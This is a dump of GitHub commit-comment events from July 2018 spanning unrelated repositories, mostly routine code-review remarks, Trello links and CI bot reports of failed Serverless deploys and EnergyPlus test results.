{"id":"7933465849","type":"CommitCommentEvent","actor":{"login":"danywayGit"},"repo":{"name":"danywayGit/CCB_Sripts"},"payload":{"comment":{"id":29632158,"position":null,"line":null,"path":null,"commit_id":"fd574675e3baf4a9de4a5f8edf0b7fbaaef3bd68","created_at":"2018-07-08T06:38:37Z","updated_at":"2018-07-08T06:38:37Z","author_association":"OWNER","body":"instead of using the standard ssh port in the firewall rules, \r\nwe use the curent ssh port defined in \"/etc/ssh/sshd_config\""}},"created_at":"2018-07-08T06:38:37Z"}
{"id":"7933466540","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29632160,"position":null,"line":null,"path":null,"commit_id":"508e48d372e15481d56c698d6e69959fa7a9a7be","created_at":"2018-07-08T06:39:18Z","updated_at":"2018-07-08T06:39:18Z","author_association":"NONE","body":"### Results for event id: a4492839-7067-40b1-997c-414f0b5d772f\n<details><summary>DockerServerless : Deploy to Lambda (885c94) Docker output validation failed for outputRegex</summary>\n<p>\n\n**output tail (164 lines total):**\n\n```\n...\n Serverless Warning --------------------------------------\n \n  A valid environment variable to satisfy the declaration 'env:SLS_CUSTOM_DOMAIN' could not be found.\n \n \n  Serverless Error ---------------------------------------\n \n  Trying to populate non string value into a string for variable ${env:SLS_CUSTOM_DOMAIN}. Please make sure the value of the property is a string.\n \n  Get Support --------------------------------------------\n     Docs:          docs.serverless.com\n     Bugs:          github.com/serverless/serverless/issues\n     Issues:        forum.serverless.com\n \n  Your Environment Information -----------------------------\n     OS:                     linux\n     Node Version:           8.11.1\n     Serverless Version:     1.28.0\n \nerror Command failed with exit code 1.\ninfo Visit https://yarnpkg.com/en/docs/cli/run for documentation about this command.\nApiGateway Endpoints:\nAT LEAST ONE DEPLOY FAILED\n>>> packaging deployment output: a4492839-7067-40b1-997c-414f0b5d772f-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/a4492839-7067-40b1-997c-414f0b5d772f-output.tar.gz\n{\n    \"ETag\": \"\\\"5ab8ea8396bfb08a08f2a6d56b0a5f93\\\"\"\n}\nExecution time was 156 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-08T06:39:18Z"}
{"id":"7933467553","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29632162,"position":null,"line":null,"path":null,"commit_id":"508e48d372e15481d56c698d6e69959fa7a9a7be","created_at":"2018-07-08T06:40:15Z","updated_at":"2018-07-08T06:40:15Z","author_association":"NONE","body":"### Results for event id: b14433d1-9364-4dd6-acf8-2007d10406bb\n<details><summary>DockerServerless : Deploy to Lambda (885c94) Docker output validation failed for outputRegex</summary>\n<p>\n\n**output tail (166 lines total):**\n\n```\n...\n Serverless Warning --------------------------------------\n \n  A valid environment variable to satisfy the declaration 'env:SLS_CUSTOM_DOMAIN' could not be found.\n \n \n  Serverless Error ---------------------------------------\n \n  Trying to populate non string value into a string for variable ${env:SLS_CUSTOM_DOMAIN}. Please make sure the value of the property is a string.\n \n  Get Support --------------------------------------------\n     Docs:          docs.serverless.com\n     Bugs:          github.com/serverless/serverless/issues\n     Issues:        forum.serverless.com\n \n  Your Environment Information -----------------------------\n     OS:                     linux\n     Node Version:           8.11.1\n     Serverless Version:     1.28.0\n \nerror Command failed with exit code 1.\ninfo Visit https://yarnpkg.com/en/docs/cli/run for documentation about this command.\nApiGateway Endpoints:\nAT LEAST ONE DEPLOY FAILED\n>>> packaging deployment output: b14433d1-9364-4dd6-acf8-2007d10406bb-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/b14433d1-9364-4dd6-acf8-2007d10406bb-output.tar.gz\n{\n    \"ETag\": \"\\\"6b980ea88b920038f9091da7a680c507\\\"\"\n}\nExecution time was 39 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-08T06:40:15Z"}
{"id":"7933468619","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29632164,"position":null,"line":null,"path":null,"commit_id":"508e48d372e15481d56c698d6e69959fa7a9a7be","created_at":"2018-07-08T06:41:15Z","updated_at":"2018-07-08T06:41:15Z","author_association":"NONE","body":"### Results for event id: 507646a1-0b63-41bf-acfb-1fe3856bb2e9\n<details><summary>DockerServerless : Deploy to Lambda (885c94) Docker output validation failed for outputRegex</summary>\n<p>\n\n**output tail (166 lines total):**\n\n```\n...\n Serverless Warning --------------------------------------\n \n  A valid environment variable to satisfy the declaration 'env:SLS_CUSTOM_DOMAIN' could not be found.\n \n \n  Serverless Error ---------------------------------------\n \n  Trying to populate non string value into a string for variable ${env:SLS_CUSTOM_DOMAIN}. Please make sure the value of the property is a string.\n \n  Get Support --------------------------------------------\n     Docs:          docs.serverless.com\n     Bugs:          github.com/serverless/serverless/issues\n     Issues:        forum.serverless.com\n \n  Your Environment Information -----------------------------\n     OS:                     linux\n     Node Version:           8.11.1\n     Serverless Version:     1.28.0\n \nerror Command failed with exit code 1.\ninfo Visit https://yarnpkg.com/en/docs/cli/run for documentation about this command.\nApiGateway Endpoints:\nAT LEAST ONE DEPLOY FAILED\n>>> packaging deployment output: 507646a1-0b63-41bf-acfb-1fe3856bb2e9-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/507646a1-0b63-41bf-acfb-1fe3856bb2e9-output.tar.gz\n{\n    \"ETag\": \"\\\"353b5f6235c8b3d204c48f71ed810049\\\"\"\n}\nExecution time was 43 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-08T06:41:15Z"}
{"id":"7933469279","type":"CommitCommentEvent","actor":{"login":"RyuunoAelia"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29632165,"position":784,"line":969,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-08T06:41:56Z","updated_at":"2018-07-08T06:41:56Z","author_association":"NONE","body":"Oh the \"mask6\" argument seems to come from stf_getsrcifa6 and apparently is the SP ipv6 mask. So this migth not be the complete delegated ipv6 prefix thus my previous remark may be wrong... again having comments on what the function expects and/or sensible naming of arguments might have helped my understanding..."}},"created_at":"2018-07-08T06:41:56Z"}
{"id":"7933469747","type":"CommitCommentEvent","actor":{"login":"nvcervantes"},"repo":{"name":"nvcervantes/apc_softdev_mi151_04"},"payload":{"comment":{"id":29632166,"position":null,"line":null,"path":null,"commit_id":"7586d8f8d69fb6735b9f6a0a65db176a097af766","created_at":"2018-07-08T06:42:21Z","updated_at":"2018-07-08T06:42:21Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [FEW - Creation of Main screen](https://trello.com/c/a70pRIuh/19-few-creation-of-main-screen)"}},"created_at":"2018-07-08T06:42:21Z"}
{"id":"7933470021","type":"CommitCommentEvent","actor":{"login":"sli1989"},"repo":{"name":"zhaojun1998/Valine-Admin"},"payload":{"comment":{"id":29632167,"position":null,"line":null,"path":null,"commit_id":"fe92efa37dfe36dc3bf76a02cc32a32f01ba47c1","created_at":"2018-07-08T06:42:37Z","updated_at":"2018-07-08T06:42:37Z","author_association":"NONE","body":"好像无法给at用户发信 \r\n\r\n```\r\nOUT web1 14:39:58\r\n这条评论没有 @ 任何人\r\nSTDOUT web1 14:39:58\r\n收到一条评论, 已提醒站长\r\n```\r\n\r\n```\r\n您的 Alex LEE's Blog 上有新的评论啦！\r\n\r\nALEX LEE 发表评论：\r\n\r\n@USER1\r\nALEX AT COMMENT TEST\r\n\r\n[查看评论]\r\n```\r\n"}},"created_at":"2018-07-08T06:42:37Z"}
{"id":"7933470174","type":"CommitCommentEvent","actor":{"login":"nvcervantes"},"repo":{"name":"nvcervantes/apc_softdev_mi151_04"},"payload":{"comment":{"id":29632168,"position":null,"line":null,"path":null,"commit_id":"403a295dc36e7140227177dac0d927664f62b41b","created_at":"2018-07-08T06:42:47Z","updated_at":"2018-07-08T06:42:47Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [FEW - Creation of Login/Registration screen](https://trello.com/c/K1s4yNjZ/14-few-creation-of-login-registration-screen)"}},"created_at":"2018-07-08T06:42:47Z"}
{"id":"7933470888","type":"CommitCommentEvent","actor":{"login":"nvcervantes"},"repo":{"name":"nvcervantes/apc_softdev_mi151_04"},"payload":{"comment":{"id":29632169,"position":null,"line":null,"path":null,"commit_id":"0e0ab07ba0cf0273bc00fb77b9f028a572554914","created_at":"2018-07-08T06:43:24Z","updated_at":"2018-07-08T06:43:24Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [FEM - Creation of Splash Screen](https://trello.com/c/7AqsDrS6/13-fem-creation-of-splash-screen)"}},"created_at":"2018-07-08T06:43:24Z"}
{"id":"7933471046","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29632170,"position":null,"line":null,"path":null,"commit_id":"591d4b04e03ab533a3025e38d0737bf95875f336","created_at":"2018-07-08T06:43:32Z","updated_at":"2018-07-08T06:43:32Z","author_association":"NONE","body":"### Results for event id: d8d15d72-97f2-42de-958c-55e2a463eb8e\n<details><summary>DockerServerless : Deploy to Lambda (885c94) Docker output validation failed for outputRegex</summary>\n<p>\n\n**output tail (373 lines total):**\n\n```\n...\nServerless: Stack update finished...\nService Information\nservice: sample-artillery\nstage: dev\nregion: ap-southeast-2\nstack: sample-artillery-dev\napi keys:\n  None\nendpoints:\n  GET - https://41q462ktgb.execute-api.ap-southeast-2.amazonaws.com/dev/sample-artillery\nfunctions:\n  sample-artillery: sample-artillery-dev-sample-artillery\n\nStack Outputs\nSampleDashartilleryLambdaFunctionQualifiedArn: arn:aws:lambda:ap-southeast-2:347186442473:function:sample-artillery-dev-sample-artillery:3\nServiceEndpoint: https://41q462ktgb.execute-api.ap-southeast-2.amazonaws.com/dev\nServerlessDeploymentBucketName: sample-artillery-dev-serverlessdeploymentbucket-13iyv17iz6ehr\n\nServerless: Removing old service artifacts from S3...\nDone in 82.73s.\nApiGateway Endpoints:\n  GET - https://41q462ktgb.execute-api.ap-southeast-2.amazonaws.com/master/sample-artillery\nAT LEAST ONE DEPLOY FAILED\n>>> packaging deployment output: d8d15d72-97f2-42de-958c-55e2a463eb8e-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/d8d15d72-97f2-42de-958c-55e2a463eb8e-output.tar.gz\n{\n    \"ETag\": \"\\\"eabdbc0de2b1dba129eab64703585f2f\\\"\"\n}\nExecution time was 118 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-08T06:43:32Z"}
{"id":"7933471047","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29632171,"position":null,"line":null,"path":null,"commit_id":"36b2b83a6130a61ebcaf84fdab153f818323efae","created_at":"2018-07-08T06:43:32Z","updated_at":"2018-07-08T06:43:32Z","author_association":"NONE","body":"### Results for event id: d8d15d72-97f2-42de-958c-55e2a463eb8e\n<details><summary>DockerServerless : Deploy to Lambda (885c94) Docker output validation failed for outputRegex</summary>\n<p>\n\n**output tail (373 lines total):**\n\n```\n...\nServerless: Stack update finished...\nService Information\nservice: sample-artillery\nstage: dev\nregion: ap-southeast-2\nstack: sample-artillery-dev\napi keys:\n  None\nendpoints:\n  GET - https://41q462ktgb.execute-api.ap-southeast-2.amazonaws.com/dev/sample-artillery\nfunctions:\n  sample-artillery: sample-artillery-dev-sample-artillery\n\nStack Outputs\nSampleDashartilleryLambdaFunctionQualifiedArn: arn:aws:lambda:ap-southeast-2:347186442473:function:sample-artillery-dev-sample-artillery:3\nServiceEndpoint: https://41q462ktgb.execute-api.ap-southeast-2.amazonaws.com/dev\nServerlessDeploymentBucketName: sample-artillery-dev-serverlessdeploymentbucket-13iyv17iz6ehr\n\nServerless: Removing old service artifacts from S3...\nDone in 82.73s.\nApiGateway Endpoints:\n  GET - https://41q462ktgb.execute-api.ap-southeast-2.amazonaws.com/master/sample-artillery\nAT LEAST ONE DEPLOY FAILED\n>>> packaging deployment output: d8d15d72-97f2-42de-958c-55e2a463eb8e-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/d8d15d72-97f2-42de-958c-55e2a463eb8e-output.tar.gz\n{\n    \"ETag\": \"\\\"eabdbc0de2b1dba129eab64703585f2f\\\"\"\n}\nExecution time was 118 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-08T06:43:32Z"}
{"id":"7933474103","type":"CommitCommentEvent","actor":{"login":"mlsilvaz"},"repo":{"name":"mlsilvaz/GitRepoDCS2018-1"},"payload":{"comment":{"id":29632178,"position":null,"line":null,"path":null,"commit_id":"7eabb79731dc77524e958b655085af007f495541","created_at":"2018-07-08T06:46:23Z","updated_at":"2018-07-08T06:46:23Z","author_association":"OWNER","body":"prueba"}},"created_at":"2018-07-08T06:46:23Z"}
{"id":"7933474144","type":"CommitCommentEvent","actor":{"login":"brusch"},"repo":{"name":"pimcore/pimcore"},"payload":{"comment":{"id":29632179,"position":null,"line":null,"path":null,"commit_id":"2c24923c5a011f767e3894c3a6c0cf5238332d73","created_at":"2018-07-08T06:46:25Z","updated_at":"2018-07-08T06:46:25Z","author_association":"MEMBER","body":"Thanks for the hint - done. "}},"created_at":"2018-07-08T06:46:25Z"}
{"id":"7933474927","type":"CommitCommentEvent","actor":{"login":"nvcervantes"},"repo":{"name":"nvcervantes/apc_softdev_mi151_04"},"payload":{"comment":{"id":29632181,"position":null,"line":null,"path":null,"commit_id":"f9f12dcd6e0f2481bb610673057150b4964ce9c7","created_at":"2018-07-08T06:47:09Z","updated_at":"2018-07-08T06:47:09Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Drafting of Business Requirement Document](https://trello.com/c/Tk6xJzzT/16-drafting-of-business-requirement-document)"}},"created_at":"2018-07-08T06:47:09Z"}
{"id":"7933475206","type":"CommitCommentEvent","actor":{"login":"nvcervantes"},"repo":{"name":"nvcervantes/apc_softdev_mi151_04"},"payload":{"comment":{"id":29632182,"position":null,"line":null,"path":null,"commit_id":"f9f12dcd6e0f2481bb610673057150b4964ce9c7","created_at":"2018-07-08T06:47:26Z","updated_at":"2018-07-08T06:47:26Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Drafting of Software Requirements Specification](https://trello.com/c/qWAV48ix/17-drafting-of-software-requirements-specification)"}},"created_at":"2018-07-08T06:47:26Z"}
{"id":"7933475742","type":"CommitCommentEvent","actor":{"login":"nvcervantes"},"repo":{"name":"nvcervantes/apc_softdev_mi151_04"},"payload":{"comment":{"id":29632183,"position":null,"line":null,"path":null,"commit_id":"0e0ab07ba0cf0273bc00fb77b9f028a572554914","created_at":"2018-07-08T06:48:01Z","updated_at":"2018-07-08T06:48:01Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [FEM - Creation of Main screen](https://trello.com/c/Z6rfXHxp/15-fem-creation-of-main-screen)"}},"created_at":"2018-07-08T06:48:01Z"}
{"id":"7933475780","type":"CommitCommentEvent","actor":{"login":"mlsilvaz"},"repo":{"name":"mlsilvaz/GitRepoDCS2018-1"},"payload":{"comment":{"id":29632184,"position":5,"line":7,"path":"Mundo/src/HolaMundo.java","commit_id":"7eabb79731dc77524e958b655085af007f495541","created_at":"2018-07-08T06:48:04Z","updated_at":"2018-07-08T06:48:04Z","author_association":"OWNER","body":"otro commit"}},"created_at":"2018-07-08T06:48:04Z"}
{"id":"7933476089","type":"CommitCommentEvent","actor":{"login":"nvcervantes"},"repo":{"name":"nvcervantes/apc_softdev_mi151_04"},"payload":{"comment":{"id":29632186,"position":null,"line":null,"path":null,"commit_id":"403a295dc36e7140227177dac0d927664f62b41b","created_at":"2018-07-08T06:48:21Z","updated_at":"2018-07-08T06:48:21Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [BE - Creation of Login screen](https://trello.com/c/uyhrak6C/10-be-creation-of-login-screen)"}},"created_at":"2018-07-08T06:48:21Z"}
{"id":"7933477176","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29632187,"position":null,"line":null,"path":null,"commit_id":"9f558d7e74118d8dc0cb1db04f2b7200f5a3618c","created_at":"2018-07-08T06:49:20Z","updated_at":"2018-07-08T06:49:20Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/bug-in-displaying-title-with-arabic-character/91798/3\n"}},"created_at":"2018-07-08T06:49:20Z"}
{"id":"7933481382","type":"CommitCommentEvent","actor":{"login":"demofan"},"repo":{"name":"looe102000/MoneyTemplateHW"},"payload":{"comment":{"id":29632194,"position":11,"line":11,"path":"MoneyTemplateHW/Models/ViewModels/MoneyBook.cs","commit_id":"e3524e4db5fbf887be19642bbcae72ed108d71d9","created_at":"2018-07-08T06:53:31Z","updated_at":"2018-07-08T06:53:31Z","author_association":"NONE","body":"這是你的 ViewModel 但是你沒有給它後綴，建議改名 `MoneyBookViewModel`"}},"created_at":"2018-07-08T06:53:31Z"}
{"id":"7933482848","type":"CommitCommentEvent","actor":{"login":"AKryukov92"},"repo":{"name":"YMnkf/java18may"},"payload":{"comment":{"id":29632195,"position":12,"line":12,"path":"Java18_05_2018/src/LR8/Task8.java","commit_id":"ca1b29f23027fbbf3d71c2722833e3b70362886f","created_at":"2018-07-08T06:55:02Z","updated_at":"2018-07-08T06:55:02Z","author_association":"CONTRIBUTOR","body":"Этот класс не компилируется. Исправьте синтаксические ошибки."}},"created_at":"2018-07-08T06:55:02Z"}
{"id":"7933486902","type":"CommitCommentEvent","actor":{"login":"Robin544"},"repo":{"name":"Robin544/AcadViewPythonProject"},"payload":{"comment":{"id":29632199,"position":null,"line":null,"path":null,"commit_id":"7e42fbc9d119c7a43592abdabe59139b7241d5e1","created_at":"2018-07-08T06:58:56Z","updated_at":"2018-07-08T06:58:56Z","author_association":"OWNER","body":"NoteTaking"}},"created_at":"2018-07-08T06:58:56Z"}
{"id":"7933487169","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29632200,"position":null,"line":null,"path":null,"commit_id":"9290bb76192afb16d7056589b4e3e7a1ba6d2930","created_at":"2018-07-08T06:59:12Z","updated_at":"2018-07-08T06:59:12Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - Win64-Windows-7-VisualStudio-14: OK (2934 of 2935 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 625\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9290bb76192afb16d7056589b4e3e7a1ba6d2930-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9290bb76192afb16d7056589b4e3e7a1ba6d2930-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-08T06:59:12Z"}
{"id":"7933494427","type":"CommitCommentEvent","actor":{"login":"Zlika"},"repo":{"name":"Zlika/theodore"},"payload":{"comment":{"id":29632218,"position":null,"line":null,"path":null,"commit_id":"cb789dbe914a593edbda9268509e88b9b136e1f8","created_at":"2018-07-08T07:05:13Z","updated_at":"2018-07-08T07:05:13Z","author_association":"OWNER","body":"That's strange because the buildbot said that the build was ok for 3DS:\r\ntheodore: [status: done] [recipes/nintendo/3ds]\r\n\r\nHowever I know what is the problem in RA's recipes/nintendo/3ds log, the last commit should fix it."}},"created_at":"2018-07-08T07:05:13Z"}
{"id":"7933494942","type":"CommitCommentEvent","actor":{"login":"demofan"},"repo":{"name":"looe102000/MoneyTemplateHW"},"payload":{"comment":{"id":29632219,"position":22,"line":22,"path":"MoneyTemplateHW/Controllers/BookkepingController.cs","commit_id":"4572133097cc81267d078d54f744263044b222d0","created_at":"2018-07-08T07:05:38Z","updated_at":"2018-07-08T07:05:38Z","author_association":"NONE","body":"假設你真的要產生這樣的物件，那只需要這樣寫\r\n```\r\nnew List<SelectListItem>\r\n{\r\n    new SelectListItem {Text = \"請選擇\", Selected = true},\r\n    new SelectListItem {Text = \"支出\"},\r\n    new SelectListItem {Text = \"收入\"}\r\n};\r\n```"}},"created_at":"2018-07-08T07:05:38Z"}
{"id":"7933496536","type":"CommitCommentEvent","actor":{"login":"graemerocher"},"repo":{"name":"micronaut-projects/micronaut-core"},"payload":{"comment":{"id":29632220,"position":null,"line":null,"path":null,"commit_id":"358a0099d116801cd3b16fedb190194fe3a6ad1a","created_at":"2018-07-08T07:07:00Z","updated_at":"2018-07-08T07:07:00Z","author_association":"MEMBER","body":"Systems like Consul and kubernetes require the /health endpoint to be available to perform health checks. When not authenticated we return only the status without all the detail. Without this change you would have to manually configure Consul and Kubernetes to authenticate which seems counterintuitive "}},"created_at":"2018-07-08T07:07:00Z"}
{"id":"7933496638","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29632221,"position":null,"line":null,"path":null,"commit_id":"8473880c4962019c978430d65808413163ce0d7a","created_at":"2018-07-08T07:07:06Z","updated_at":"2018-07-08T07:07:06Z","author_association":"MEMBER","body":"I am curious how this `makie` plugin is supposed to work. `makie` plugins are suitable for either Makefile commands which do **not** have any associated environment variables OR Makefile commands having environment variables which have **path** info, such as filters. However, I am guessing since you added this you were able to get `makie citation-reference` to work, but it is not immediately obvious to me how."}},"created_at":"2018-07-08T07:07:06Z"}
{"id":"7933496751","type":"CommitCommentEvent","actor":{"login":"Zlika"},"repo":{"name":"Zlika/theodore"},"payload":{"comment":{"id":29632222,"position":null,"line":null,"path":null,"commit_id":"36a3ba61c7af3d63354972c18cfb7bd91aeadf8a","created_at":"2018-07-08T07:07:12Z","updated_at":"2018-07-08T07:07:12Z","author_association":"OWNER","body":"Thanks for the tips. I already used include/compat/msvc but there are path errors in the makefile. I hope to have fix these problems in the last commit.\r\nFor stdbool.h, why didn't you also provide a sdtboll.h file in include/compat/msvc the same way you do for stdint.h?"}},"created_at":"2018-07-08T07:07:12Z"}
{"id":"7933497699","type":"CommitCommentEvent","actor":{"login":"yprasant0"},"repo":{"name":"MRASL/kinova-ros"},"payload":{"comment":{"id":29632223,"position":null,"line":null,"path":null,"commit_id":"2400703eadddd1f5ce2b24ae9fa600130f9d4bf5","created_at":"2018-07-08T07:08:01Z","updated_at":"2018-07-08T07:08:01Z","author_association":"NONE","body":"I am tried to run $roslaunch kinova_gazebo robot_launch.launch kinova_robotType:=j2n6s300 use_trajectory_controller:=false  \r\ncommand but I was still getting the error : \r\n\r\nError [Param.cc:451] Unable to set value [-nan -nan -nan] for key[size]\r\ngzclient: /build/ogre-1.9-mqY1wq/ogre-1.9-1.9.0+dfsg1/OgreMain/src/OgreNode.cpp:630: virtual void Ogre::Node::setScale(const Ogre::Vector3&): Assertion `!inScale.isNaN() && \"Invalid vector supplied as parameter\"' failed.\r\nAborted (core dumped)\r\n[gazebo_gui-3] process has died [pid 18295, exit code 134, cmd /opt/ros/kinetic/lib/gazebo_ros/gzclient __name:=gazebo_gui __log:=/home/prasant/.ros/log/db124980-827c-11e8-a2ec-e09467437f4c/gazebo_gui-3.log].\r\nlog file: /home/prasant/.ros/log/db124980-827c-11e8-a2ec-e09467437f4c/gazebo_gui-3*.log\r\n\r\n\r\nI have changed the values to box size to small non-zero vaues"}},"created_at":"2018-07-08T07:08:01Z"}
{"id":"7933498361","type":"CommitCommentEvent","actor":{"login":"strumet"},"repo":{"name":"strumet/strumet.github.io"},"payload":{"comment":{"id":29632224,"position":null,"line":null,"path":null,"commit_id":"55c659d139c9105a97c0d1add02ed54af14fa2e1","created_at":"2018-07-08T07:08:35Z","updated_at":"2018-07-08T07:08:35Z","author_association":"OWNER","body":"Ciao Fangyi,\r\nnell’esercizio cad EX02 lo spessore delle linee che rappresentano i muri deve essere raddoppiato rispetto agli esercizi precedenti (ad esempio da 0.35mm a 0.70mm): devi dunque agire sul CTB modificando lo spessore collegato al colore col quale sono tracciati i muri.\r\nmf"}},"created_at":"2018-07-08T07:08:35Z"}
{"id":"7933498731","type":"CommitCommentEvent","actor":{"login":"SagaeH"},"repo":{"name":"SagaeH/assessment"},"payload":{"comment":{"id":29632225,"position":null,"line":null,"path":null,"commit_id":"c21b90bd89e81acf1376986f734a2c317cdee31f","created_at":"2018-07-08T07:08:55Z","updated_at":"2018-07-08T07:08:55Z","author_association":"OWNER","body":"#1 に対する対応をしました。"}},"created_at":"2018-07-08T07:08:55Z"}
{"id":"7933499001","type":"CommitCommentEvent","actor":{"login":"sparrowzhang28"},"repo":{"name":"sparrowzhang28/NettoPC"},"payload":{"comment":{"id":29632226,"position":null,"line":null,"path":null,"commit_id":"25ed542d04526c3de71864d1064f8814b64f993d","created_at":"2018-07-08T07:09:10Z","updated_at":"2018-07-08T07:09:10Z","author_association":"OWNER","body":"aaaa07081506"}},"created_at":"2018-07-08T07:09:10Z"}
{"id":"7933499292","type":"CommitCommentEvent","actor":{"login":"HCBZM"},"repo":{"name":"HCBZM/webpack-vue-2"},"payload":{"comment":{"id":29632227,"position":19,"line":20,"path":"package.json","commit_id":"6cd460742f69a8507f7e63780b1a9b34c2e489a1","created_at":"2018-07-08T07:09:25Z","updated_at":"2018-07-08T07:09:25Z","author_association":"OWNER","body":"2"}},"created_at":"2018-07-08T07:09:25Z"}
{"id":"7933500216","type":"CommitCommentEvent","actor":{"login":"GIANTCRAB"},"repo":{"name":"cloudcreativity/laravel-json-api"},"payload":{"comment":{"id":29632230,"position":null,"line":null,"path":null,"commit_id":"ea135721a836940afedabb74cf7888e26afa482f","created_at":"2018-07-08T07:10:15Z","updated_at":"2018-07-08T07:10:15Z","author_association":"CONTRIBUTOR","body":"What's the missing URL for 'see this issue'?"}},"created_at":"2018-07-08T07:10:15Z"}
{"id":"7933504808","type":"CommitCommentEvent","actor":{"login":"darrena092"},"repo":{"name":"StrikerX3/OpenXBOX"},"payload":{"comment":{"id":29632237,"position":null,"line":null,"path":null,"commit_id":"d59db53b1f369cd583ca8b3f2593953d0c972404","created_at":"2018-07-08T07:14:33Z","updated_at":"2018-07-08T07:14:33Z","author_association":"NONE","body":"Sorry about that ;)"}},"created_at":"2018-07-08T07:14:33Z"}
{"id":"7933506362","type":"CommitCommentEvent","actor":{"login":"vochicong"},"repo":{"name":"hashpuppy/sample-market-maker"},"payload":{"comment":{"id":29632243,"position":null,"line":null,"path":null,"commit_id":"b750ee0a7f5317a740ff25eb3f22822f82b17e84","created_at":"2018-07-08T07:15:59Z","updated_at":"2018-07-08T07:15:59Z","author_association":"NONE","body":"Thank you for sharing. I've refactored it and made PR https://github.com/BitMEX/sample-market-maker/pull/132."}},"created_at":"2018-07-08T07:15:59Z"}
{"id":"7933507264","type":"CommitCommentEvent","actor":{"login":"ahughbank"},"repo":{"name":"ahughbank/first-entry"},"payload":{"comment":{"id":29632244,"position":null,"line":null,"path":null,"commit_id":"66901db5a62ec270eff1f37a8a3bb10d491b5b43","created_at":"2018-07-08T07:16:33Z","updated_at":"2018-07-08T07:16:33Z","author_association":"OWNER","body":"<css>\r\nh1 {\r\ncolor: purple;\r\n}"}},"created_at":"2018-07-08T07:16:33Z"}
{"id":"7933507957","type":"CommitCommentEvent","actor":{"login":"yomigold"},"repo":{"name":"will62794/go_prng_cracker"},"payload":{"comment":{"id":29632252,"position":null,"line":null,"path":null,"commit_id":"59b6ed13b96ec7413eefc27c1c0a2203e94adc0c","created_at":"2018-07-08T07:17:09Z","updated_at":"2018-07-08T07:17:09Z","author_association":"NONE","body":"Hi Willy, I am an admirer of your works, especially the RNG, Is there any other private platform to communicate with you? I have a proposal kindly respond here. Thanks. "}},"created_at":"2018-07-08T07:17:09Z"}
{"id":"7933508931","type":"CommitCommentEvent","actor":{"login":"yomigold"},"repo":{"name":"will62794/go_prng_cracker"},"payload":{"comment":{"id":29632255,"position":null,"line":null,"path":null,"commit_id":"57430cae45f59edbc0445bffe9492931e3b08753","created_at":"2018-07-08T07:18:01Z","updated_at":"2018-07-08T07:18:01Z","author_association":"NONE","body":"Nice. "}},"created_at":"2018-07-08T07:18:01Z"}
{"id":"7933509332","type":"CommitCommentEvent","actor":{"login":"madanagopalt"},"repo":{"name":"pxscene/pxCore"},"payload":{"comment":{"id":29632256,"position":null,"line":null,"path":null,"commit_id":"4c0d7101e931198ce88cb865a7186e17b55965bd","created_at":"2018-07-08T07:18:20Z","updated_at":"2018-07-08T07:18:20Z","author_association":"CONTRIBUTOR","body":"unitttest added as part of https://github.com/pxscene/pxCore/pull/1310"}},"created_at":"2018-07-08T07:18:20Z"}
